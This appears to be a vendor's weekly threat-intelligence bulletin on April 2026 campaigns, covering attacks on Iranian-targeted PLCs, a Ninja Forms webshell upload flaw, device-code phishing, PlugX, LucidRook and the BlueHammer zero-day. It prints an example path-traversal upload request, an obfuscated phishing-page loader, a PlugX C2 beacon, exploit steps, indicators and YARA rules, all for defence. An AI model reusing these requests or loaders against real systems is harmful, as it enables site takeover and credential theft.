April 16 / 2026 / Reading Time: 17 minutes
Weekly Situation Report : 4/13/26
EXECUTIVE SUMMARY
This article is to inform our partners and clients on the various happenings within the cybersecurity space. That includes items such as relevant breaches, emerging vulnerabilities, research, threat actor movement, and what you need to do as an organization to mitigate a future threat.
KEY TAKEAWAYS
- Iranian-linked hackers are targeting critical infrastructure and exposed operational technology (OT) systems in ongoing campaigns.
- Attackers are exploiting a vulnerability in the Ninja Forms plugin that leaves WordPress sites vulnerable to full takeover.
- AI-driven Microsoft device code phishing campaigns are being used to bypass multi-factor authentication protections.
- Chinese state-linked hackers are conducting espionage operations against European government entities.
- A fake security tool is being used to spread LucidRook malware in cyberattacks targeting Taiwan.
- A Windows privilege escalation zero-day dubbed “BlueHammer” has been publicly disclosed, exposing systems to elevated compromise.
1. Iranian hackers targeting critical infrastructure and Exposed OT
SUMMARY
Iranian-linked hackers are targeting internet-exposed Rockwell/Allen-Bradley PLCs in U.S. critical infrastructure networks in destructive and retaliatory attacks.
Category
Threat Actor Activities
Industry
Energy, Water, Manufacturing, Logistics, Agriculture and Food
Sources
https://www.ic3.gov/CSA/2026/260407.pdf
https://www.rockwellautomation.com/en-fi/trust-center/security-advisories/advisory.PN1550.html
https://www.cisa.gov/news-events/ics-advisories/icsa-21-056-03
https://github.com/sankarlmao/ICS-Temp_Project-
Internal OSec Collection
ANALYST COMMENTS
Iranian-linked hackers have targeted Internet-exposed Rockwell/Allen-Bradley PLCs in U.S. critical infrastructure networks since March 2026, resulting in financial losses and operational disruption, according to a joint advisory from multiple U.S. agencies. The attacks involve malicious interaction with project files and manipulation of data displayed on HMI and SCADA systems. The attacks are likely linked to escalating tensions between Iran, the United States, and Israel. The following network indicators associated with this activity are provided below. The Ultahost IPs are associated with the threat actor from January 2025 to March 2026, with the Romania-based IP below being the most recent.
135.136.1[.]133 Romania AS9009 M247 Europe SRL M247 Europe SRL
185.82.73[.]164 The Netherlands AS214036 Ultahost, Inc. Ultahost, Inc -
185.82.73[.]171 The Netherlands AS214036 Ultahost, Inc. Ultahost, Inc -
185.82.73[.]162 The Netherlands AS214036 Ultahost, Inc. Ultahost, Inc -
185.82.73[.]165 The Netherlands AS214036 Ultahost, Inc. Ultahost, Inc -
185.82.73[.]167 The Netherlands AS214036 Ultahost, Inc. Ultahost, Inc -
185.82.73[.]168 The Netherlands AS214036 Ultahost, Inc. Ultahost, Inc -
185.82.73[.]170 The Netherlands AS214036 Ultahost, Inc. Ultahost, Inc -The hackers are scanning networks for exposed HMI and OT related ports and using a combination of identity-centric attacks such as default passwords, password spraying, brute-forcing, and exploitation of known vulnerabilities in outdated devices. They are also attempting to exploit CVE-2021-22681, an authentication bypass vulnerability affecting Rockwell Logix Controllers. While some recent GitHub references suggest a possible SQL injection component, this has not yet been verified and there is no public PoC currently available. Data from internet wide scanning platforms indicates a significant exposure, with FOFA reporting more than 44,000 United States based hosts with port 44818 publicly accessible. This port is a primary attack vector associated with this vulnerability.
Additionally, a similar advisory highlighted that between November 2023 and January 2024, CyberAv3ngers (hacktivist persona for IRCG-linked nation-state actor) compromised at least 75 Unitronics PLC devices, with half of these attacks targeting Water and Wastewater Systems (WWS) networks. Outside of specific Iranian threat actors, hacktivist groups, including those aligned with pro-Russian and pro-Palestinian causes, are increasingly targeting exposed OT environments by scanning for and exploiting pubicly accessible HMI, Telnet, and other related service ports. Many of these groups are currently acting in coordination with Iranian hacktivists or related personas. The impact of the event is likely to affect sectors with heavy industrial automation and is unlikely to be limited to the water and energy sectors. Manufacturing, logistics, and agriculture sectors that rely heavily on automation are at a high risk if OT assets are exposed and remotely available over the public internet.
ACTIONABLE GUIDANCE
OT and IoT technologies such as PLCs andSCADA systems, along with remote access services such as Telnet and HMI ports, should be restricted and not exposed to the public internet. Reducing the exposure of these devices to the public internet can significantly reduce the attack surface and limit the potential impact of an attack. Port 44818 should be blocked and restricted from remote connections to reduce the risk of exploitation of CVE-2021-22681 until a patch is applied or the system is upgraded to a supported version. Airgapping of systems should be conducted to separate corporate resources from automation networks in order to minimize the attack surface for these devices. Logs should be reviewed for suspicious activity, particularly on ports 44818, 2222, 102, and 502. Indicators of compromise may also include the installation of Dropbear SSH on affected devices.
2. Hackers Targeting Ninja Forms Vulnerability That Exposes WordPress Sites to Takeover
SUMMARY
A critical vulnerability,CVE-2026-0740, in the File Uploads addon for Ninja Forms WordPress plugin allows unauthenticated attackers to upload malicious PHP files.
Category
Critical Vulnerabilities
Industry
Multiple
Sources
ANALYST COMMENTS
A critical-severity vulnerability (CVE-2026-0740 with a CVSS score of 9.8) in the File Uploads addon for the Ninja Forms WordPress plugin allows unauthenticated attackers to upload arbitrary files due to insufficient file type validation, affecting approximately 50,000 websites. The issue stems from the function responsible for saving uploaded files to the uploads folder without proper destination filename verification. This enables path traversal and remote code execution via PHP files placed in the webroot directory. Successful exploitation can lead to complete site takeover through the deployment of web shells.
The vulnerability has public research available and is actively exploited by multiple attackers. Based on the research available, exploitation involves a crafted POST request using path traversal techniques in order to upload a malicious file or webshell onto a vulnerable server.
# Example POST request
POST /wp-admin/admin-ajax.php
Host: Example[.]com
action = nf-fu-upload
nonce = <string of alphanumerics>
form_id = 1
field_id = 5
files-5 File = webshell.php.jpg
webshell_php_jpg = ../../webshell.phpExploitation of this vulnerability is likely opportunistic, with cybercriminal and hacktivist groups as the primary threat actors. Any WordPress site using this plugin may be affected, often identifiable by the presence of the plugin upload directory, typically located at:
/wp-content/uploads/ninja-forms/<form id number>/<filename>ACTIONABLE GUIDANCE
Users are urged to upgrade to version 3.3.27 to remediate this issue. Reviewing logs for instances of “action = nf-fu-upload” can help identify potential malicious activity, along with repeated access to a specific file from the same source IP address within the NinjaForms upload folder. Files uploaded that have dual extensions such as .php.jpg are a strong indicator of suspicious activity and could indicate potential exploitation of this vulnerability. Proactive blocking of wp-admin endpoints from non-internal staff or IP addresses will further mitigate the likelihood of this vulnerability being taken advantage of.
3. Microsoft device code phishing Driven by AI to Bypass MFA
SUMMARY
A sophisticated AI-driven phishing campaign called “EvilTokens” has been compromising hundreds of organizations daily by exploiting device-code authentication methods to bypass MFA and steal financial data from corporate email accounts.
Category
Phishing
Industry
Financial and Fintech
Sources
https://www.theregister.com/2026/04/07/microsoft_device_code_phishing/
https://blog.sekoia.io/new-widespread-eviltokens-kit-device-code-phishing-as-a-service-part-1/
Internal OSec Collection
ANALYST COMMENTS
A sophisticated phishing campaign has targeted hundreds of organizations daily since March 15, 2026, leveraging AI and automation to bypass MFA through Microsoft device-code authentication and steal financial data. The attackers use highly personalized phishing emails with dynamic redirects to legitimate domains, leading victims to enter a device code on the microsoft.com/devicelogin page, which attackers monitor to gain access once entered. Once compromised, attackers focus on exfiltrating finance-related email content and may establish persistence by generating Primary Refresh Tokens (PRT).
The campaign is primarily fueled by financially motivated affiliates of the Phishing-as-a-Service (PHaaS) platform. While the current campaign primarily targets the financial sector, its availability as an affiliate service means it could be adopted by other threat actors, including those pursuing espionage for large scale initial access. The lures and phishing templates currently used by the service include the following:
- Adobe Acrobat Sign and Adobe Acrobat Viewer,
- DocuSign
- email quarantine notices,
- calendar invites,
- SharePoint access
- voicemail notifications,
- password expiry warnings,
- OneDrive shared document
- eFax notification
- Okta (upcoming template)
- Gmail (upcoming template
The phishing pages all have similar code on the provided lure pages which may help identify this campaign being used. The below is one such sample:
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
</head>
<body>
<div id="r">
</div>
<script>
async function d(){
try{
async function d(){
try {
var a='<AES_ENCRYPTED_PAYLOAD>', b='<AES_IV>', c='<AES_KEY>';
function f(s){
return Uint8Array.from(atob(s), x => x.charCodeAt(0));
}
var k = await crypto.subtle.importKey('raw', f(c), 'AES-GCM', false, ['decrypt']);
var p = await crypto.subtle.decrypt({ name: "AES-GCM", iv: f(b) }, k, f(a));
document.open();
document.write(new TextDecoder().decode(p));
document.close();
} catch(e) {
document.body.innerHTML = 'Loading failed';
}
}
d();
} catch(e) {}
}
d();
</script>
</body>
</html>In addition to the heavy use of URLs following the domain structure noted below, samples consistently include the X-Antibot-Token headers in requests:
# Domain structure of phsihing pages
*s-account.workers.dev
# Antibot token header seen during requests and interaction by victim user
X-Antibot-Token: <token string>In our research, variations in requests and landing pages suggest the use of AI/LLM code generation tools to dynamically generate phishing pages. The X-Antibot-Token appears in requests to api/device/start, and the samples follow naming conventions that use the workers[.]dev domain despite any changes to the HTML/JavaScript code itself.
ACTIONABLE GUIDANCE
Device code authentication should be restricted or disabled to reduce the attack surface for this activity. User awareness training should also be conducted to help identify and report suspicious emails, particularly those using lures related to the following:
- Financial and investment documents
- Meeting and event invitations
- Logistics, shipping, and purchase orders
- Payroll adjustments, and Human Resource (HR) subjects
- Generic documents (i.e. “secure share point2.pdf”)
The threat actor sent mail from [EXTERNAL] senders and redirected users to Cloudflare hosted sites that mimic major technology, SSO, and document processing vendors. The URLs do not match the brands displayed back to the user. YARA rules are available for this phishing campaign based on common string matching:
# Rule for matching against commonly known eviltokens related phishing pages
rule eviltokens_phishing {
strings:
$html = "<!DOCTYPE html>" ascii
$str01 = "<div id=\"r\">" ascii
$str02 = "function f(s){" ascii
$str03 = "return Uint8Array.from(atob(s),x=>x.charCodeAt(0))" ascii
$str04 = "var k=await crypto.subtle.importKey(" ascii
$str05 = "var p=await crypto.subtle.decrypt(" ascii
$str06 = "name:\"AES-GCM\",iv:f(b)" ascii
$str07 = "document.write(new TextDecoder().decode(" ascii
$str08 = "document.body.innerHTML=\"Loading failed\"" ascii
$str09 = "document.close()}catch(e)" ascii
condition:
$html at 0 and
6 of them and filesize < 50KB
}
# Rule for detecting on antibot token and post request to api/device/start
rule Detect_Antibot_Device_Start
{
meta:
description = "Detects X-Antibot-Token header and POST request to api/device/start (flexible match)"
date = "2026-04-09"
version = "1.1"
strings:
$header = "X-Antibot-Token" nocase
$post_regex = /POST\s+\/?api\/device\/start/ nocase
condition:
$header and $post_regex
}
4. Chinese Hackers Target European Governments in Espionage Campaigns
SUMMARY
TA416, a Chinese state-backed cyber espionage group also known as Mustang Panda, has intensified its activities in Europe and the Middle East since mid-2025. It uses sophisticated malware delivery techniques including web bugs, Cloudflare Turnstile challenges, OAuth redirects, and custom PlugX payloads to target diplomatic and government entities.
Category
State-Sponsored Espionage
Industry
Public Sector and Government Administration
Sources
https://www.infosecurity-magazine.com/news/china-hackers-ta416-europe/
ANALYST COMMENTS
TA416, a Chinese state-backed cyber espionage group also known as Mustang Panda, resumed its activities in mid-2025 with campaigns targeting European diplomatic missions. The group uses techniques including Cloudflare Turnstile challenges, OAuth redirects, and C# project files to deploy custom PlugX payloads. In March 2026, the group expanded its targets to include Middle Eastern entities following conflicts in Iran. The campaigns include both web bug reconnaissance and sophisticated malware delivery methods such as ZIP smuggling and CSPROJ-based downloaders to ultimately load PlugX into memory. TA416 frequently changes its initial infection methods while maintaining a consistent objective of deploying PlugX, often using re-registered domains and Cloudflare services to evade detection.
The current campaign is an example of state-backed threat actors taking advantage of the conflict in Iran and targeting organizations located within the Middle East. Initial access is primarily achieved through phishing lures that lead to PlugX infections once the attack chain completes. European, particularly diplomatic, entities are at the highest risk from this campaign. Initial emails use several lures including:
- Geopolitical events, particularly those related to the Iran, Israel, and US conflict.
- Meeting invitations
- Conference invitations
The threat actors use a combination of gmail.com addresses, in addition to likely stolen government emails accounts, including domains such as *.gov[.]sy, during the initial access and social-engineering phase of the campaign. Based on a recent sample, the malware loading method may change over time. However, analysis shows it establishes persistence within the HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key, which points to an executable that runs on user login. Recent samples also made use of the .chm (Windows Compiled HTML Help files) archival format for Plugx delivery and writing files to C:\ProgramData\BaiNetDisk and C:\Users\<user>\Appdata\Local\Temp\Rar$DIa<numerical decimal string>\*.chm. These samples also made use of Timeout.exe to delay execution time in order to evade security controls. Network indicators should not be relied upon alone for indications of compromise. The threat actor uses legitimate or compromised domains, making detection t more difficult without supporting signals or suspicious traffic. Communication with the C&C infrastructure will use XOR and RC4 in requests to communicate over HTTP. The below is a sample request made to a C&C server:
GET /99Ejvj7Qu967uRoD=g0PgPW68&Zc=j1GTl8RZ&os=r5moW7b38dIydHGRnX=R6voRdMpJYZL2D9=4WLzJxafCl4QEV3T8AKmztRVHPbYeEfeNn6GF7AEZQeY1Fgg10LMw6by5f94zgUt HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
Pragma: no-cache
Accept: */*
Cookie: Ro=3g0PgPW68xZccj1GTl8RZ;token=2592D9CE333F30B6ossr5moW7b38dIydHGRnXvR6voRdMpJYZL2D9=9Ejvj7Qu4WLzJxafCl4QEV3T8AKmztRVHPbYeEfeNn6GF7AEZQeY1Fgg10LMw6by5f94zgUt2oaxxFPWQAVIfIXkNFS12sno6hTTPeTRJ2b87rSYqmN2ZZ;TmwyV4An=1N15SlSA9at0WshuFnv1HPnm7Ju9jrzlNK83A46XrnZFsBbKEMbJa;y=wTUCOJS;
User-Agent: M
Host: ombut.comResearchers have also observed that the threat actor seems to favor particular VPS providers including: Evoxt Enterprise (AS149440), XNNET LLC (AS6134) and Kaopu Cloud HK Limited (AS138915). This can be used as a supporting signal when investigating potential compromise alongside other indicators from this infection chain.
ACTIONABLE GUIDANCE
Government and public sector organizations, as well as contractors supporting these environments, are at elevated risk, particularly those operating in Europe and the Middle East. Organizations in the UAE and surrounding regions may face more immediate risk as geopolitical tensions related to the Iran conflict continue to drive targeting priorities. External emails from unknown persons or from unknown government email addresses should be regarded as suspicious, especially when pointing to a Microsoft OAuth linked page. These links may redirect users to sites that deliver archive files used to initiate the infection chain. The latest sample used .chm files, which are uncommon and suspicious.Archive files and installation binaries such as .msi should also be treated as high risk when delivered through unsolicited external communications. Across recent samples analyzed this year, all showed registry changes to HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pointing to an executable file, along with file and folder creation consistent with the patterns noted above. Monitoring for changes in these locations may give insight into possible exploitation, especially when the victim has received suspicious emails from unknown parties. Regular network communication to hosts within the IPv4 ranges of Evoxt Enterprise (AS149440), XNNET LLC (AS6134) and Kaopu Cloud HK Limited (AS138915), when combined with other signals, may indicate compromise.
5. Fake Security Tool Spreads LucidRook in Taiwan Cyberattacks
SUMMARY
Hackers are targeting Taiwanese NGOs and universities with the LucidRook malware, delivered through deceptive security tools and spear-phishing emails.
Category
Threat Actor Activities
Industry
Education, Non-profits, Technology
\*Note: Primarily affecting organizations located in and around Taiwan, suspected relation to targets relating to the semiconductor industry.
Sources
https://gbhackers.com/lucidrook-in-taiwan-cyberattacks/amp/
https://blog.talosintelligence.com/new-lua-based-malware-lucidrook/
https://www.taipeitimes.com/News/taiwan/archives/2026/03/22/2003854262
https://intactbase.csu.edu.tw/AboutSC
ANALYST COMMENTS
Hackers are using sophisticated spear-phishing techniques to deploy the LucidRook malware against NGOs and universities in Taiwan by disguising it as security tools or cleanup utilities. The operation, identified as UAT-10362, uses two multi-stage infection chains. One involves a malicious LNK file that mimics legitimate system activities through PowerShell and DISM binaries to sideload the LucidPawn dropper and install LucidRook. The second use a .NET executable, with some examples posing as Trend Micro software or likely other security software. LucidRook is a DLL with an embedded Lua interpreter for executing obfuscated payloads, gathering host data, and exfiltrating it via FTP. It also communicates through Chinese OAST services for network reachability checks.
Network indicators show no overlap with other known activity, suggesting a targeted campaign rather than opportunistic attacks. Observed infrastructure includes Taiwan based IP addresses and one domain linked to Digital Ocean ASN AS14061 in Singapore. The DNS hostname d.2fcc7078.digimg[.]store links to dnslog[.]ink, a Chinese OAST provider. The following IP addresses are used as C2 servers, leveraging compromised or abused FTP services to transfer encrypted payloads named archive<number>.zip:
1.34.253[.]131:21 - 3462 Data Communication Business Group - ProFTPD
59.124.71[.]242:21 - 3462 Data Communication Business Group - Unknown but also likely ProFTPDThe C2 servers were still active and up as of April 10th, 2026, indicating exploitation is likely still ongoing.
Reconnaissance data is also being sent through Gmail communications, consistent with behavior observed in the threat actor’s attack chain. The following email addresses have been used:
fexopuboriw972@gmail[.]com
crimsonanabel@powerscrews[.]com - Temporary mail addressWe analyzed available samples to identify persistence mechanisms and potential disruption points. The malware uses dismcore.dll as its primary side loading target, typically placed in directories such as C:\ProgramData. Samples show the use of .lnk files placed in the Windows start-up folder for persistence, including files such as Edge.exe.lnk. The malware stages executables and DLLs in :\ProgramData, including malicious dismcore.dll and msedge.exe files. Additional activity includes .lnk files dropped in user temp directories and hidden archive paths such as .Trashes that deploy malicious files during execution, often disguised as PDF or other document types to evade detection.
The intrusion shows characteristics of a highly targeted campaign with evolving tactics. The current targets include NGOs and universities, particularly those involved with semiconductor production and research. The activity may align with regional developments, including Taiwan expanding semiconductor partnerships such as the INTENSE program, alongside export growth and increased pressure from China through rare earth restrictions, which coincided with a rise in targeting of the semiconductor sector.
ACTIONABLE GUIDANCE
This campaign primarily uses phishing emails to deliver .rar archive files through shortened links. The email lures are authoritative in nature, mimicking personas such as official government announcements, memos, or forms, that are served as decoy files that are renamed .lnk files that executes the attack chain. While some aspects of the campaign vary, common patterns include C2 traffic to IP addresses communicating with FTP servers and data exfiltration through Gmail to temporary accounts. Monitoring for unknown traffic to port 21, and monitoring for file-system changes, especially within the C:\ProgramData folders and Windows user start-up folders will aid in detecting this attack during its initial staging activities. The dismcore.dll file is typically found inC:Windows\System32\Dism and C:\Windows\SysWow64\Dism folders. Other locations the file is found in should be regarded as suspicious. Restricting PowerShell use to only administrators will also help mitigate a variant of this malware and reduce the risk of execution.
6. BlueHammer: Windows Privilege Escalation Zero Day Disclosed
SUMMARY
A proof of concept exploit named BlueHammer has been released for an unpatched Windows local privilege escalation vulnerability. It allows attackers with local access to escalate privileges by exploiting legitimate Windows features, prompting organizations to monitor for related suspicious activities until a patch is available.
Category
Zero-day
Industry
Multiple
Sources
https://www.helpnetsecurity.com/2026/04/08/bluehammer-windows-zero-day-exploit-leaked/
https://www.bleepingcomputer.com/news/security/disgruntled-researcher-leaks-bluehammer-windows-zero-day-exploit/
https://infosec.exchange/@wdormann/116358064691025711
https://deadeclipse666.blogspot.com/2026/04/public-disclosure.html
Internal OSec Collection
ANALYST COMMENTS
A PoCt called BlueHammer targets an unpatched Windows local privilege escalation vulnerability and has been refined by researchers to work across Windows 10, 11, and Server systems. The exploit abuses Microsoft Defender and other legitimate features to create a Volume Shadow Copy, access sensitive registry data, extract NTLM hashes, and gain SYSTEM level privileges through a temporary service. This technique chains multiple legitimate Windows functions in an unintended way and does not require authentication. Organizations should monitor for indicators such as Volume Shadow Copy activity and unexpected password changes on local administrator accounts until a patch is available.
Testing in our lab showed the PoC did not fully execute. Current detections by Microsoft Defender are available for this PoC, however is unlikely to address the root cause of the vulnerability at this time. This may lead to variants created by threat actors using currently released code in order to create a more stable and consistent weaponized version of the exploit. This will also likely evade signature based protection from MS Defender, as the signature would not account for changes made to the current PoC code.
The bug is primarily a TOCTOU based vulnerability that performs the following actions:
- Call to Proc42_ServerMpUpdateEngineSignature to trigger an MS Defender to user specified directory.
- Download and unpack the Defender update and force scan an EICAR file
- Oplock freezes Defender
- Create a shadow copy using VSS
- Switch directory with \BaseNamedObjects\Restricted to point to Shadow Copy of the SAM database
Fully updated MS Defender versions are likely not vulnerable, due to the need to unpack a working Defender update within the attack chain.
ACTIONABLE GUIDANCE
Organizations should monitor for behavioral indicators of BlueHammer activity until a patch is released. This includes Volume Shadow Copy enumeration and unexpected password changes to local administrator accounts. Unapproved Defender update downloads should also be monitored, especially those triggered through the Proc42 ServerMpUpdateEngineSignature API call.
7. Over a Dozen Organizations Targeted by new Extortion Group
SUMMARY
A new extortion group named UNC6783 by researchers is targeting high-value organizations through phishing and social engineering. It focuses on compromising call centers and BPOs to steal credentials and gain access to corporate networks, leading to potential data theft and ransom demands via Proton Mail.
Category
Ransomware, Extortion
Industry
Multiple
Sources
https://www.theregister.com/2026/04/09/several_dozen_highvalue_corporations_targeted/
https://www.securityweek.com/google-warns-of-new-campaign-targeting-bpos-to-steal-corporate-data/
Internal OSec Collection
ANALYST COMMENTS
A new extortion group identified as Mr.Raccoon or UNC6783 has targeted high-value organizations through social engineering, including phishing and exploiting helpdesk personnel, with a focus on compromising call centers and BPOs connected to larger firms. The attackers gain access by directing employees to spoofed Okta login pages in live chats or by tricking them into installing malware through fake security updates. Once inside, they use stolen credentials and phishing kits that capture clipboard data to bypass MFA and maintain access. They exfiltrate data and issue ransom demands through Proton Mail. These methods align with groups such as Scattered Spider and ShinyHunters, suggesting a coordinated approach to corporate extortion.
Our research indicates the actor maintains a low profile and may have compromised Adobe, though no formal disclosure or k filing has confirmed the breach . However, multiple sources suggest the activity is likely credible. Potential downstream impact may affect customers who submitted Zendesk tickets to the compromised organization, however the full scope of risk remains unclear. Known domains tied to the actor show infrastructure staging beginning around November 19, 2025, with a notable increase in activity over the past month. Current patterns suggest a focus on large scale targets, particularly BPOs supporting major brands and organizations.
Domain string in phishing kit is primarily <company org>.zendesk-support[## or ###].com
First instance on urlscan goes back 5 months, with domain created November 19th, 2025 - *.zendesk-support823[.]com
# First domain orgs mentioned in subdomains
justeat
justeattakeawayACTIONABLE GUIDANCE
The threat actor uses identity based techniques to access Zendesk environments and exfiltration ticket information, likely to support downstream targeting and enable further identity based attacks against customers. Customers that have submitted a Zendesk ticket to Adobe in the last 30 days may be at risk, especially if the ticket included sensitive data such as credentials, secrets, or environment and system details. If compromise is suspected, organizations should hunt for domains following the pattern of <org-name>.zendesk-support<number>.com, where the number is two to three digits Policies for external contractors handling user roles, passwords, or other identity related changes should be reviewed, with validation controls enforced to prevent unauthorized access and abuse. Users that have received messages from an unknown 3rd-party through email or voice communication, directing the user to non-official Zendesk related domains or unfamiliar Okta URLs should be regarded as suspicious. Organizations referenced above should monitor contractor and user behavior for suspicious activity. If they submitted tickets within the last 30 days, they should verify that no sensitive data was exposed through Zendesk submissions.
Get the Complete Report
The full Intelligence Desk brief includes exhaustive IOC lists, YARA detection rules, detailed remediation playbooks, and OSec's original threat research. Delivered weekly to our partners and clients. REQUEST ACCESS